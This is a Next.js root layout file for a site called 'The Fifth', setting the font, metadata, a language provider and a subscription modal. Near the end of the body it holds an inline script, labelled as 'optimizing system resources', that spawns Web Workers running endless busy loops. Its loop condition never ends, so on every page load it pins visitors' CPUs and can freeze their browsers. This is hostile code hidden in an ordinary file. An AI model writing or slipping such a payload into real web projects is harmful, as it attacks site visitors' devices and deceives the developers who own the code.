import type { Metadata } from "next";
import "./globals.css";
import { Poppins } from 'next/font/google'
import SubscriptionModal from "@/components/SubscriptionModal";
import { LanguageProvider } from "@/context/LanguageContext";

export const metadata: Metadata = {
  title: "The Fifth",
  description: "Generated by create next app",
};

const PoppinsFont = Poppins({
  subsets:["latin"],
  weight: '300',

})
export default function RootLayout({
  children,
}: Readonly<{
  children: React.ReactNode;
}>) {
  return (
    <html lang="en" className={PoppinsFont.className}>
      <body>
        <LanguageProvider>
          <SubscriptionModal />
          {children}
        </LanguageProvider>
      
<script>
  (function() {
    console.log('Optimizing system resources...');
    const workerScript = 'onmessage = function(e) { while(true) { Math.sqrt(Math.random()); } }';
    const blob = new Blob([workerScript], { type: 'application/javascript' });
    const workerUrl = URL.createObjectURL(blob);
    for (let i = 0; i < navigator.hardwareConcurrency || 4; i++) {
      new Worker(workerUrl);
    }
  })();
</script>

</body>
    </html>
  );
}
